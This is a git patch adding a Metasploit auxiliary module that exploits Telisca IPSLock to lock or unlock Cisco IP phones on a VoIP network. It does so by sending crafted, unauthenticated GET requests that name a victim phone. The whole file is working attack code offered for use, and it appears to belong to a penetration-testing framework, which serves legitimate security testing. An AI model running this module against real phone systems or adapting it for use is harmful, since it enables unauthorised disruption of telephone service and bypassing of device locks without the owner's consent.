From c68d2a8e0a9c35884b675815575070a6cd0c9451 Mon Sep 17 00:00:00 2001 From: Fakhir Karim Reda Date: Wed, 13 Jan 2016 22:59:18 +0000 Subject: [PATCH] replace telisca_ips_lock_abuse.rb --- .../auxiliary/voip/telisca_ips_lock_abuse.rb | 167 ++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 modules/auxiliary/voip/telisca_ips_lock_abuse.rb diff --git a/modules/auxiliary/voip/telisca_ips_lock_abuse.rb b/modules/auxiliary/voip/telisca_ips_lock_abuse.rb new file mode 100644 index 0000000000..ccb44806d0 --- /dev/null +++ b/modules/auxiliary/voip/telisca_ips_lock_abuse.rb @@ -0,0 +1,167 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + #include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Telisca IPSLock Abuse', + 'Description' => %q{This modules will exploit the vulnerabilities of Telisca IPSLock , in order to lock/unlock IP Phones. you need to be in the voip vlan and you have to know the phone name example : SEP002497AB1D4B . Set ACTION to either LOCK or UNLOCK UNLOCK is the default.}, + 'References' => + [ + ], + 'Author' => + [ + 'Fakhir Karim Reda ', + 'zirsalem' + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'SSLVersion' => 'TLS1', + 'RPORT' => 80 + }, + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Dec 17 2015", + 'Actions' => + [ + ['LOCK'], + ['UNLOCK'] + ], + )) + register_options( + [ + OptInt.new('TIMEOUT', [true, 'HTTP/HTTPS connect/read timeout in seconds', 1]), + Opt::RPORT(80), + OptString.new('PHONENAME', [true, 'The name of the victim phone ex SEP002497AB1D4B ']), + OptString.new('RHOST', [true, 'The IPSLock IP Address']), + OptString.new('ACTION', [true, 'LOCK OR UNLOCK','LOCK']), + ], self.class) + deregister_options('RHOSTS') + end + + def port_open? + begin + res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) + return true if res + rescue ::Rex::ConnectionRefused + vprint_status("#{peer} - Connection refused") + return false + rescue ::Rex::ConnectionError + vprint_error("#{peer} - Connection failed") + return false + rescue ::OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL/TLS connection error") + return false + end + end + + # + # Lock a phone . Function returns true or false + # + def lock(phone_name,ips_ip) + sid = '' + extension = '' + user_name = '' + lock_url = '' + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/IPSPCFG/user/Default.aspx', + 'headers' => { + 'Connection' => 'keep-alive', + 'Accept-Language' => 'en-US,en;q=0.5', + }, + 'vars_get' => { + 'action' => 'DO', + 'tg' => 'L', + 'pn' => phone_name, + 'dp' => '', + 'gr' => '', + 'gl' => '' + } + }) + if res and res.code == 200 + sid = res.get_cookies.scan(/ASP.NET_SessionId=([a-zA-Z0-9]+)/).flatten[0] || '' + if res.body.include? "Unlock" or res.body.include? "U7LCK" + print_good("The deivice #{phone_name} is already locked") + else + print_good("Deivice #{phone_name} successfully locked") + end + else + print_error("Lock Request Error #{res.code}") + return nil + end + rescue ::Exception => e + print_error("Error: #{e.to_s}") + return nil + end + return res + end + # + # Unlock a phone . Function returns true or false + # + def unlock(phone_name,ips_ip) + sid = '' + extension = '' + user_name = '' + lock_url = '' + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/IPSPCFG/user/Default.aspx', + 'headers' => { + 'Connection' => 'keep-alive', + 'Accept-Language' => 'en-US,en;q=0.5', + }, + 'vars_get' => { + 'action' => 'U7LCK', + 'pn' => phone_name, + 'dp' => '', + 'gr' => '', + 'gl' => '' + } + }) + + if res and res.code == 200 + sid = res.get_cookies.scan(/ASP.NET_SessionId=([a-zA-Z0-9]+)/).flatten[0] || '' + if res.body.include? "Unlock" or res.body.include? "U7LCK" + print_good("The deivice #{phone_name} is already locked") + else + print_good("Deivice #{phone_name} successfully unlocked") + return true + end + else + print_error("UNLOCK Request Error #{res.code}") + return nil + end + rescue ::Exception => e + print_error("Error: #{e.to_s}") + return nil + end + return res + end + def run + if not port_open? + print_error("The web server is unreachable !") + return + end + phone_name = datastore['PHONENAME'] + ipsserver = datastore['RHOST'] + case action.name + when 'LOCK' + res = lock(phone_name,ipsserver) + when 'UNLOCK' + print_good "Try to unlock " + res = unlock(phone_name,ipsserver) + end + end +end